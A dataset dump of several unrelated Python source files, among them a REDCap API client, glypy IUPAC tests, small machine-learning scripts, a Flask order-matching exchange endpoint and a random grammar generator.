# metadata uniformly categorizes fields by their instrument name, but\n # the records API doesn't report the instrument name for records that\n # come from instruments that aren't repeating. Maybe that will change,\n # but this code would probably keep working anyway. - Nov 2019\n\n errors = defaultdict(list)\n all_subjects = set()\n for r in self.get_records(\n type=debug_type,\n raw=True,\n raw_headers=True,\n checkbox_labels=False,\n survey_fields=True,\n data_access_groups=True,\n ):\n\n def _check_error_map_add():\n def _record_error(what):\n errors[what].append(\n {\n \"event\": event,\n \"subject\": subject,\n \"field\": field,\n \"value\": value,\n \"form\": form,\n }\n )\n\n mapped_value = value\n if (not raw_selectors) and (field in selector_map):\n if value not in selector_map[field]:\n # Is this code the right place for data error checks?\n # Consider removing this.\n if value in selector_map[field].values():\n _record_error(\"choice value as text\")\n else:\n _record_error(\"choice value is missing\")\n return False\n mapped_value = selector_map[field][value]\n if field not in field_forms:\n return False\n if event not in event_forms:\n return False\n if form not in event_forms[event]:\n return False\n if field != record_id_field:\n if field == f\"{form}_complete\":\n store[event][form][subject][instance][field] = {\n mapped_value\n }\n else:\n store[event][form][subject][instance][field].add(\n mapped_value\n )\n return True\n\n event = r.pop(\"redcap_event_name\")\n\n # The API will return 1, \"2\", for repeat instances.\n # Note that 1 was an int and 2 was a str.\n # The API can also return \"\" or nothing at all.\n instance = str(r.pop(\"redcap_repeat_instance\", \"1\") or \"1\")\n repeat_form = r.pop(\"redcap_repeat_instrument\", None)\n\n if debug_type == \"eav\":\n subject = r[\"record\"]\n all_subjects.add(subject)\n\n field = r[\"field_name\"]\n value = r[\"value\"]\n form = repeat_form or field_forms.get(field)\n\n _check_error_map_add()\n else:\n subject = r.pop(record_id_field)\n all_subjects.add(subject)\n\n for field, value in r.items():\n form = repeat_form or field_forms.get(field)\n\n if re.search(r\"___\\d+$\", field): # probably checkboxes\n real_field, real_value = field.rsplit(\"___\", 1)\n if real_field in selector_map: # definitely checkboxes\n if value == \"0\":\n continue # checkbox not selected\n if value == \"\":\n continue # checkbox not present\n\n field = real_field\n value = real_value\n form = field_forms.get(field)\n\n if value == \"\": # regular field not populated\n continue\n\n _check_error_map_add()\n\n for event_name, event_form_names in event_forms.items():\n for form_name in event_form_names:\n for subject in all_subjects:\n if not store[event_name][form_name][subject]:\n store[event_name][form_name][subject] = {\"1\": dict()}\n for i, iv in store[event_name][form_name][subject].items():\n if f\"{form_name}_complete\" not in iv:\n store[event_name][form_name][subject][i][\n f\"{form_name}_complete\"\n ] = {\"Incomplete\"}\n\n return _undefault_dict(store), _undefault_dict(errors)\n","repo_name":"d3b-center/d3b-redcap-api-python","sub_path":"d3b_redcap_api/redcap.py","file_name":"redcap.py","file_ext":"py","file_size_in_byte":23139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"32352140717","text":"from numpy import ndarray, array\nfrom bolt.spark.array import BoltArraySpark\nfrom thunder.series import fromarray, fromrdd\n\ndef toseries(y):\n\n if type(y) is ndarray:\n y = fromarray(y)\n elif type(y) is BoltArraySpark:\n y = fromrdd(y.tordd())\n\n if len(y.shape) != 2:\n raise ValueError(\"factorization on for 2-dimensional arrays\")\n\n return y\n","repo_name":"justinplittle/thunder-factorization","sub_path":"factorization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"20"} +{"seq_id":"21158241112","text":"import unittest\n\n\nimport glypy\nfrom glypy.composition import composition_transform\nfrom . import common\nfrom glypy.io import iupac, glycoct\n\nmonosaccharides = common.monosaccharides\n\n\nclass IUPACTests(unittest.TestCase):\n def test_monosaccharide_to_iupac(self):\n iupac_residue = iupac.to_iupac(monosaccharides.Fucose)\n reference = \"a-L-Fucp\"\n self.assertEqual(iupac_residue, reference)\n\n def test_hexa(self):\n text = \"a-D-HexpA\"\n result = iupac.from_iupac(text)\n self.assertAlmostEqual(result.mass(), 194.042, 2)\n\n def test_autoname_substituent(self):\n h = monosaccharides.Hex\n h.add_substituent(\"phosphate\")\n iupac.substituents_map_to.pop(\"phosphate\")\n t = iupac.to_iupac(h)\n r = iupac.from_iupac(t)\n self.assertEqual(h, r)\n\n def test_special_cases(self):\n for text, mass in [('?-D-Neup', 267.095), ('?-D-Neup5Ac', 309.105), ('a-D-Neup5NGc', 325.100)]:\n self.assertAlmostEqual(iupac.from_iupac(\n iupac.to_iupac(iupac.from_iupac(text))).mass(), mass, 2)\n\n def test_ring_type(self):\n for text, start, stop in [(\"a-D-Hexp\", 1, 5), (\"a-D-Hexf\", 1, 4), (\"a-D-Hexo\", 0, 0)]:\n mono = iupac.from_iupac(text)\n self.assertEqual(mono.ring_start, start)\n self.assertEqual(mono.ring_end, stop)\n\n def test_alternate_superclass(self):\n text = \"a-D-2-deoxy-araHex\"\n mono = iupac.from_iupac(text)\n self.assertEqual(mono.stem[0], 'ara')\n\n def test_monosaccharide_from_iupac(self):\n text = \"a-L-Fucp\"\n reference = monosaccharides.Fucose\n result = iupac.from_iupac(text)\n self.assertEqual(result, reference)\n\n def test_glycan_to_iupac(self):\n reference = 'a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'\n structure = common.load(\"complex_glycan\")\n self.assertEqual(iupac.to_iupac(structure), reference)\n\n def test_glycan_from_iupac(self):\n text = 'a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'\n reference = common.load(\"complex_glycan\")\n self.assertEqual(glycoct.canonicalize(iupac.from_iupac(text)), glycoct.canonicalize(reference))\n\n def test_glycan_from_iupac_file_like(self):\n text = '''>test\n a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1\n -3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp\n -(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'''\n reader = iupac.IUPACParser.loads(text, 'fasta')\n structure = next(reader)\n\n text = 'a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'\n equiv = next(iupac.IUPACParser.loads(text, 'line'))\n self.assertEqual(equiv, structure)\n\n\nclass DerivatizationAwareIUPACTests(unittest.TestCase):\n def test_monosaccharide_parse(self):\n text = '?-?-Hexp2NAc^Me'\n parser = iupac.DerivatizationAwareMonosaccharideDeserializer()\n obj, _ = parser(text)\n ref = composition_transform.derivatize(glypy.monosaccharides.HexNAc, 'methyl')\n self.assertEqual(obj, ref)\n\n def test_monosaccharide_serialize(self):\n obj = composition_transform.derivatize(glypy.monosaccharides.HexNAc, 'methyl')\n ref = '?-?-Hexp2NAc^Me'\n serializer = iupac.DerivatizationAwareMonosaccharideSerializer()\n text = serializer(obj)\n self.assertEqual(text, ref)\n\n def test_derivatized_glycan_parse(self):\n ref = composition_transform.derivatize(\n glypy.motifs[\"N-Glycan complex 1\"], \"methyl\")\n serializer = iupac.GlycanSerializer(iupac.DerivatizationAwareMonosaccharideSerializer())\n text = serializer(ref)\n deserializer = iupac.GlycanDeserializer(iupac.DerivatizationAwareMonosaccharideDeserializer())\n obj = deserializer(text)\n self.assertEqual(obj, ref)\n\n def test_compatible_with_non_derivatized(self):\n serializer = iupac.GlycanSerializer(iupac.DerivatizationAwareMonosaccharideSerializer())\n deserializer = iupac.GlycanDeserializer(iupac.DerivatizationAwareMonosaccharideDeserializer())\n self.assertEqual(\n deserializer(\n serializer(\n glypy.motifs[\"N-Glycan complex 1\"])),\n glypy.motifs[\"N-Glycan complex 1\"])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mobiusklein/glypy","sub_path":"tests/test_iupac.py","file_name":"test_iupac.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"20"} +{"seq_id":"38956292472","text":"import matplotlib.pyplot as plt \r\nfrom sklearn import datasets\r\nfrom sklearn import svm\r\ni=int(input(\"ENTER ANY RANDOM NUMBER LESS THAN 1700: \"))\r\ndigits= datasets.load_digits()\r\nclf =svm.SVC(gamma=0.0001,C=100)\r\nx,y= digits.data[:-1], digits.target[:-1]\r\nclf.fit(x,y)\r\nprint(\"PREDICTION: \", clf.predict(digits.data[[i]]))\r\nplt.imshow(digits.images[i], cmap=plt.cm.gray_r, interpolation='nearest')\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"SAUMITRAJAGDALE/Image_Classification_SVM","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"24779938751","text":"# Importing the libraries\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.preprocessing import Imputer\n\nnltk.download('stopwords')\n\n\n# Importing the dataset\ndef read_data(path):\n\n print('reading data')\n dataset = pd.read_csv(path)\n # Taking care of missing data\n imputer = Imputer(missing_values = 'NaN', strategy = 'most_frequent', axis = 0)\n dataset['class'] = imputer.fit_transform(dataset[['class']]).ravel()\n x = dataset.iloc[:, :-1].values\n print('Start bag of words')\n x = bag_of_words(x)\n y = dataset.iloc[:, 1].values\n # Splitting the dataset into the Training set and Test set\n print('splitting data')\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20, random_state=0, shuffle=True)\n print('data was read')\n return x_train, x_test, y_train, y_test, x\n\n\n# Creating Bag of Words model\ndef bag_of_words(x):\n\n corpus = []\n for i in range(0, len(x)):\n try:\n content = open_link(''.join(x[i]))\n except Exception:\n pass\n page = re.sub('[^\\u0627-\\u064a]', ' ', str(content))\n page = page.lower()\n page = page.split()\n ps = PorterStemmer()\n page = [ps.stem(word) for word in page if not word in set(stopwords.words('arabic'))]\n page = ' '.join(page)\n corpus.append(page)\n print((i + 1) / len(x) * 100, '%')\n print(i + 2)\n\n cv = CountVectorizer(max_features=1500)\n x = cv.fit_transform(corpus).toarray()\n\n return x\n\n\n# Get link data\ndef open_link(link):\n\n f = requests.get(link)\n page = BeautifulSoup(f.content, 'html.parser')\n return page\n\n\n# Train data\ndef train_data(x_train, y_train):\n\n print('start training data')\n # Fitting Naive Bayes to the Training set\n classifier = GaussianNB()\n print('fitting data')\n classifier.fit(x_train, y_train)\n print('training finished')\n return classifier\n\n\ndef get_results(classifier, x_test, y_test):\n # Predicting the Test set results\n predictions = classifier.predict(x_test)\n accuracy = accuracy_score(y_test, predictions)\n score = f1_score(y_test,predictions)\n print('testing results: ')\n return score, accuracy\n\n\nif __name__ == \"__main__\":\n x_train, x_test, y_train, y_test,x = read_data('Dataset.csv')\n classifier = train_data(x_train, y_train)\n score, accuracy = get_results(classifier, x_test, y_test)\n print('score = ', score*100, '%')\n print('accuracy = ', accuracy*100, '%')\n","repo_name":"agtaweel/LinksClassification","sub_path":"LinksClassificationTask.py","file_name":"LinksClassificationTask.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"11286296289","text":"import numpy as np\nfrom signal_likelihood import SignalLikelihood\nimport unittest\nfrom numpy.testing import assert_array_almost_equal,assert_almost_equal, assert_equal\nimport math\n\n\"\"\"\nModels the ambient audio scenery with a multivariate\nGaussian distributions. Based on that model we can distinguish \nbetween the ambient sounds and sounds that are \nunlikely to occur naturally. \n\nThis model allows for correlations between the input values. \n\n\"\"\" \nclass MultivariateGaussian(SignalLikelihood):\n def __init__(self): \n self.mean = None \n self.var = None\n self.sumSquareDif = None\n self.n = 0 \n\n def train(self, features):\n \"\"\"\n Updates the mean and variance of the gaussian model capturing the \n ambient sound scenery. \n \"\"\"\n if self.mean is None:\n # no previous mean or variance exist \n self.mean = features\n\n # we need a zero vector with the size of the feature vector\n self.sumSquareDif = np.zeros_like(features)\n self.var = np.zeros_like(features)\n self.n = 1\n else: \n # previous mean is old_sum / old_n => new_sum = (old_sum * old_n) + new values \n old_mean = self.mean \n old_sum = old_mean * self.n \n new_sum = old_sum + features \n self.n = self.n + 1\n self.mean = new_sum / self.n \n\n # vectorizaed adaption of Knuth's online variance algorithm\n # the original algorithm can be found here: \n # Donald E. Knuth (1998). The Art of Computer Programming, volume 2: \n # Seminumerical Algorithms, 3rd edn., p. 232. Boston: Addison-Wesley.\n\n # update sum of square differences \n self.sumSquareDif = self.sumSquareDif + (features - old_mean) * (features - self.mean)\n\n # update variance \n self.var = self.sumSquareDif / (self.n - 1)\n\n def calculate_prob(self, features):\n \"\"\" \n Calculates the probability that the signal described by the \n features is an ambient sound. \n \"\"\" \n if np.any(self.var == 0): \n return 0 \n\n # this is a vectorized version of the pdf of a normal distribution for each frequency amplitude\n # it returns one probability for each of the signal's frequency amplitudes \n probs = np.exp(-(features-self.mean)**2/(2.*self.var**2)) / (math.sqrt(math.pi * 2.) * self.var)\n\n # simplificaiton: assumption of independent frequencies => product \n return np.prod(probs)\n\n\nclass GaussianTests(unittest.TestCase):\n def train(self, data): \n gaussian = Gaussian() \n\n for datum in data: \n gaussian.train(datum)\n\n return gaussian\n\n def checkMean(self, data, expectedMean): \n gaussian = self.train(data) \n assert_almost_equal(gaussian.mean, expectedMean)\n\n def checkVariance(self, data, exptectedVar): \n gaussian = self.train(data)\n assert_almost_equal(gaussian.var, exptectedVar)\n\n\n def test_mean_for_one_feature(self):\n data = [np.array([0.]), np.array([6.]), np.array([10.]), np.array([8.])]\n expectedMean = np.array([6.])\n\n self.checkMean(data, expectedMean)\n\n def test_mean_for_multiple_features(self):\n data = [np.array([0., 3.]), np.array([6., 8.]), np.array([10., 4.]), np.array([8., 7.])]\n expectedMean = np.array([6., 5.5])\n\n self.checkMean(data, expectedMean)\n\n def test_variance_for_one_feature(self):\n data = [np.array([1.]), np.array([0.]), np.array([2.]), np.array([1.]), np.array([0.])]\n expectedVariance = np.array([0.7])\n\n self.checkVariance(data, expectedVariance)\n\n def test_variance_for_one_feature(self):\n data = [np.array([1., 0.]), np.array([0., 2.]), np.array([2., 1.]), np.array([1., 0.]), np.array([0., 1.])]\n expectedVariance = np.array([0.7, 0.7])\n\n self.checkVariance(data, expectedVariance)\n\n def test_probability_calculation(self): \n gaussian = Gaussian() \n gaussian.mean = np.array([5., 3.])\n gaussian.var = np.array([2., 1.])\n x = np.array([4.,4.])\n\n expected = 0.0426 \n actual = gaussian.calculate_prob(x)\n assert_almost_equal(actual,expected, decimal=4)\n\n ","repo_name":"rfcx/defunct","sub_path":"sound-localization/localization/multivariate_gaussian.py","file_name":"multivariate_gaussian.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20638581628","text":"def isprime(x):\r\n for i in range(2,x):\r\n if x%i==0:\r\n return False\r\n return True\r\n\r\ndef mini_number(string):\r\n s1=string[0]\r\n s2=string[1]\r\n if int(s1)*int(s2)<=9 and len(string)>=3:\r\n string=str(int(s1)*int(s2))+string[2:]\r\n return mini_number(string)\r\n else:\r\n tmp_string=list(string)\r\n tmp_string.sort()\r\n string=\"\"\r\n for i in range(len(tmp_string)):\r\n string+=tmp_string[i]\r\n return int(string)\r\n \r\ndef checkio(num):\r\n tmp=\"\"\r\n end_num=num\r\n while end_num>1:\r\n for i in range(2,10):\r\n if end_num%i==0 and isprime(i):\r\n tmp+=str(i)\r\n end_num=end_num//i\r\n break\r\n if isprime(end_num):\r\n tmp+=str(end_num)\r\n break\r\n n=1\r\n for j in range(len(tmp)):\r\n n=n*int(tmp[j])\r\n if n!=num:\r\n return 0\r\n\r\n else:\r\n return int(tmp)\r\n \r\n \r\n\r\n\r\n\r\n \r\n##print(checkio(33))\r\n##print(checkio(20))\r\n##print(checkio(3125))\r\n##print(checkio(9973))\r\n##print(checkio(8146))\r\n##print(checkio(17))\r\n##print(checkio(560))\r\nprint(checkio(12))\r\n","repo_name":"arua23/checkio_solutions","sub_path":"numbers_factory_tmp.py","file_name":"numbers_factory_tmp.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14123640945","text":"from flask import Flask, request, g\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom flask import jsonify\nimport json\nimport eth_account\nimport algosdk\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import load_only\nfrom datetime import datetime\nimport sys\n\nfrom models import Base, Order, Log\n\nengine = create_engine('sqlite:///orders.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\napp = Flask(__name__)\n\n\n@app.before_request\ndef create_session():\n g.session = scoped_session(DBSession)\n\n\n@app.teardown_appcontext\ndef shutdown_session(response_or_exc):\n sys.stdout.flush()\n g.session.commit()\n g.session.remove()\n\n\n\"\"\" Suggested helper methods \"\"\"\n\n\ndef check_sig(payload, sig):\n \n payload_dict = json.loads(payload)\n platform = payload_dict['platform']\n pk = payload_dict['sender_pk']\n\n verification_result = False\n\n if platform == 'Ethereum':\n eth_encoded_msg = eth_account.messages.encode_defunct(text=payload)\n if eth_account.Account.recover_message(eth_encoded_msg, signature=sig) == pk:\n verification_result = True\n\n elif platform == 'Algorand':\n if algosdk.util.verify_bytes(payload.encode('utf-8'), sig, pk):\n verification_result = True\n\n return verification_result\n\n\ndef fill_order(order, txes=[]):\n buy_currency = order['buy_currency']\n sell_currency = order['sell_currency']\n buy_amount = order['buy_amount']\n sell_amount = order['sell_amount']\n sender_pk = order['sender_pk']\n receiver_pk = order['receiver_pk']\n implied_exchange_rate = buy_amount / sell_amount\n new_order_sell_rate = sell_amount / buy_amount\n\n order_obj = Order(sender_pk=order['sender_pk'], receiver_pk=order['receiver_pk'],\n buy_currency=order['buy_currency'], sell_currency=order['sell_currency'],\n buy_amount=order['buy_amount'], sell_amount=order['sell_amount'])\n g.session.add(order_obj)\n g.session.commit()\n\n new_order_ID = order_obj.id\n\n query = g.session.query(Order).filter(\n Order.filled == None, Order.buy_currency == sell_currency, Order.sell_currency == buy_currency\n )\n result = g.session.execute(query)\n amount = 0\n id_order_matched = 0\n\n for order in result.scalars().all():\n existing_order_exchange_rate = order.sell_amount / order.buy_amount\n if existing_order_exchange_rate >= implied_exchange_rate:\n if order.sell_amount > amount:\n amount = sell_amount\n id_order_matched = order.id\n #pass\n\n if id_order_matched != 0:\n existing_order_sell_amount = 0\n existing_order_buy_amount = 0\n existing_order_sell_rate = 0\n existing_order_sender_pk = None\n existing_order_receiver_pk = None\n\n now = datetime.now()\n\n query1 = g.session.query(Order).filter(Order.id == id_order_matched)\n result1 = g.session.execute(query1)\n for order in result1.scalars().all():\n order.filled = now\n order.counterparty_id = new_order_ID\n existing_order_sell_amount = order.sell_amount\n existing_order_buy_amount = order.buy_amount\n existing_order_sender_pk = order.sender_pk\n existing_order_receiver_pk = order.receiver_pk\n existing_order_sell_rate = existing_order_sell_amount / existing_order_buy_amount\n g.session.commit()\n\n query2 = g.session.query(Order).filter(Order.id == new_order_ID)\n result2 = g.session.execute(query2)\n for order in result2.scalars().all():\n order.filled = now\n order.counterparty_id = id_order_matched\n g.session.commit()\n\n child_order_obj = None\n\n if existing_order_sell_amount < buy_amount:\n final_sell_amount = existing_order_sell_amount\n final_buy_amount = existing_order_buy_amount\n\n buy_amount = buy_amount - final_buy_amount\n sell_amount = buy_amount * new_order_sell_rate\n creator_id = new_order_ID\n\n child_order = {}\n child_order['sender_pk'] = sender_pk\n child_order['receiver_pk'] = receiver_pk\n child_order['buy_currency'] = buy_currency\n child_order['sell_currency'] = sell_currency\n child_order['buy_amount'] = buy_amount\n child_order['sell_amount'] = sell_amount\n child_order['creator_id'] = creator_id\n\n child_order_obj = Order(sender_pk=child_order['sender_pk'],\n receiver_pk=child_order['receiver_pk'],\n buy_currency=child_order['buy_currency'],\n sell_currency=child_order['sell_currency'],\n buy_amount=child_order['buy_amount'],\n sell_amount=child_order['sell_amount'],\n creator_id=child_order['creator_id'])\n g.session.add(child_order_obj)\n g.session.commit()\n\n\n elif existing_order_sell_amount > buy_amount:\n final_sell_amount = sell_amount\n final_buy_amount = buy_amount\n\n buy_currency_original = buy_currency\n sender_pk = existing_order_sender_pk\n receiver_pk = existing_order_receiver_pk\n buy_currency = sell_currency\n sell_currency = buy_currency_original\n buy_amount = existing_order_buy_amount - final_sell_amount\n sell_amount = buy_amount * existing_order_sell_rate\n creator_id = id_order_matched\n\n child_order = {}\n child_order['sender_pk'] = sender_pk\n child_order['receiver_pk'] = receiver_pk\n child_order['buy_currency'] = buy_currency\n child_order['sell_currency'] = sell_currency\n child_order['buy_amount'] = buy_amount\n child_order['sell_amount'] = sell_amount\n child_order['creator_id'] = creator_id\n\n child_order_obj = Order(sender_pk=child_order['sender_pk'],\n receiver_pk=child_order['receiver_pk'],\n buy_currency=child_order['buy_currency'],\n sell_currency=child_order['sell_currency'],\n buy_amount=child_order['buy_amount'],\n sell_amount=child_order['sell_amount'],\n creator_id=child_order['creator_id'])\n\n g.session.add(child_order_obj)\n g.session.commit()\n\n txes.append(order)\n txes.append(child_order)\n\ndef log_message(d):\n # Takes input dictionary d and writes it to the Log table\n # Hint: use json.dumps or str() to get it in a nice string form\n log_obj = Log(message=Log['message'])\n g.session.add(log_obj)\n g.session.commit()\n\n\n\"\"\" End of helper methods \"\"\"\n\n\n@app.route('/trade', methods=['POST'])\ndef trade():\n print(\"In trade endpoint\")\n if request.method == \"POST\":\n content = request.get_json(silent=True)\n print(f\"content = {json.dumps(content)}\")\n columns = [\"sender_pk\", \"receiver_pk\", \"buy_currency\", \"sell_currency\", \"buy_amount\", \"sell_amount\", \"platform\"]\n fields = [\"sig\", \"payload\"]\n\n for field in fields:\n if not field in content.keys():\n print(f\"{field} not received by Trade\")\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n for column in columns:\n if not column in content['payload'].keys():\n print(f\"{column} not received by Trade\")\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n # Your code here\n # Note that you can access the database session using g.session\n\n # TODO: Check the signature\n result = False\n json_string = json.dumps(content)\n contentPyth = json.loads(json_string)\n\n signature = contentPyth['sig']\n payload = json.dumps(contentPyth['payload'])\n\n verification_result=check_sig(payload, signature)\n\n # TODO: Add the order to the database\n sender_pk = contentPyth['payload']['sender_pk']\n receiver_pk = contentPyth['payload']['receiver_pk']\n buy_currency = contentPyth['payload']['buy_currency']\n sell_currency = contentPyth['payload']['sell_currency']\n buy_amount = contentPyth['payload']['buy_amount']\n sell_amount = contentPyth['payload']['sell_amount']\n\n if verification_result == True:\n order = {}\n order['sender_pk'] = sender_pk\n order['receiver_pk'] = receiver_pk\n order['buy_currency'] = buy_currency\n order['sell_currency'] = sell_currency\n order['buy_amount'] = buy_amount\n order['sell_amount'] = sell_amount\n\n # TODO: Fill the order\n txes = []\n fill_order(order, txes)\n result = True\n else:\n log_message(payload)\n # TODO: Be sure to return jsonify(True) or jsonify(False) depending on if the method was successful\n return (jsonify(result))\n\n@app.route('/order_book')\ndef order_book():\n # Your code here\n # Note that you can access the database session using g.session\n keyList = ['sender_pk', 'receiver_pk', 'buy_currency', 'sell_currency', 'buy_amount', 'sell_amount', 'signature']\n query = g.session.query(Order)\n query_result = g.session.execute(query)\n initial_result = []\n for order in query_result.scalars().all():\n order_dict = dict.fromkeys(keyList)\n order_dict['sender_pk'] = order.sender_pk\n order_dict['receiver_pk'] = order.receiver_pk\n order_dict['buy_currency'] = order.buy_currency\n order_dict['sell_currency'] = order.sell_currency\n order_dict['buy_amount'] = order.buy_amount\n order_dict['sell_amount'] = order.sell_amount\n order_dict['signature'] = order.signature\n initial_result.append(order_dict)\n\n # Note that you can access the database session using g.session\n keyList2 = ['data']\n result = dict.fromkeys(keyList2)\n result['data'] = initial_result\n return jsonify(result)\n\nif __name__ == '__main__':\n app.run(port='5002')\n","repo_name":"lawrencechangit/CIT5820Project4","sub_path":"exchange_endpoint.py","file_name":"exchange_endpoint.py","file_ext":"py","file_size_in_byte":10491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14149082880","text":"import random\n\nhead_first = False\nsubject_left = False\nverb_attraction = False\nserial_verb = False\n\nenglish_mode = False\n\nps_rules = {}\nlexicon = {}\nenglexicon = {}\n\nenglish_ps_rules = {\n 'S': [['NP','VP']],\n 'VP': [[\"V'\",'NP'], [\"V'\"], [\"V'\",'S'], [\"V'\", 'PP'], [\"V'\", 'NP', 'PP'], [\"V'\", 'PP', 'S'], [\"V'\", 'NP', 'PP', 'S']] + [[\"V'\"]] * 4 + [[\"V'\", 'NP']] * 2,\n \"V'\": [['V'], ['V','B']] + [['V']] * 3,\n 'NP': [['D', \"N'\"]],\n \"N'\": [['N'], ['A', \"N'\"], [\"N'\", 'PP']] + [['N']] * 3,\n 'PP': [['P', 'NP']]\n}\n\n# basically, use the principles and parameters approach to generate\n# phrase-structure rules randomly so we can use those PS-rules later to generate\n# sentences\ndef init():\n global head_first\n global subject_left\n global verb_attraction\n global serial_verb\n global ps_rules\n global lexicon\n global englexicon\n head_first = random.random() < 0.5\n subject_left = random.random() < 0.90\n verb_attraction = random.random() < 0.2\n serial_verb = random.random() < 0.2\n if head_first and not subject_left and verb_attraction:\n verb_attraction = False\n elif not head_first and subject_left and verb_attraction:\n verb_attraction = False\n ps_rules['VP'] = [[\"V'\"]]\n ps_rules['NP'] = []\n ps_rules['S'] = [['NP', 'VP']] if subject_left else [['VP', 'NP']]\n ps_rules[\"N'\"] = [['N']] * 3\n ps_rules[\"V'\"] = [['V']] * 2\n ps_rules['PP'] = []\n if serial_verb:\n ps_rules['VP'] += [['VP', 'VP']]\n ps_rules['NP'] += [['D', \"N'\"]]\n ps_rules[\"N'\"] += [[\"N'\", 'A'], [\"N'\", 'PP']]\n ps_rules['PP'] += [['P', 'NP']]\n ps_rules['VP'] += [[\"V'\", 'NP'], [\"V'\"], ['V', 'S']]\n ps_rules[\"V'\"] += [[\"V'\", 'PP'], [\"V'\", 'B']]\n for rule in ps_rules['NP']:\n if not head_first: rule.reverse()\n for rule in ps_rules['VP']:\n if not head_first: rule.reverse()\n for rule in ps_rules[\"N'\"]:\n if not head_first: rule.reverse()\n for rule in ps_rules[\"V'\"]:\n if not head_first: rule.reverse()\n for rule in ps_rules['PP']:\n if not head_first: rule.reverse()\n for rule in ps_rules['NP']:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules['VP']:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules[\"N'\"]:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules[\"V'\"]:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules['PP']:\n if random.random() < 0.05: rule.reverse()\n\n with open(\"dictionary.txt\",\"r\",encoding='utf-8') as f:\n lextemp = f.readlines()\n for i in range(len(lextemp)):\n if i % 2 == 0:\n lexicon[lextemp[i].replace('\\n','').replace(':','')] = lextemp[i+1].replace('\\n','').split(',')\n with open(\"lexicon.txt\",\"r\",encoding='utf-8') as f:\n lextemp = f.readlines()\n for i in range(len(lextemp)):\n if i % 2 == 0:\n englexicon[lextemp[i].replace('\\n','').replace(':','')] = 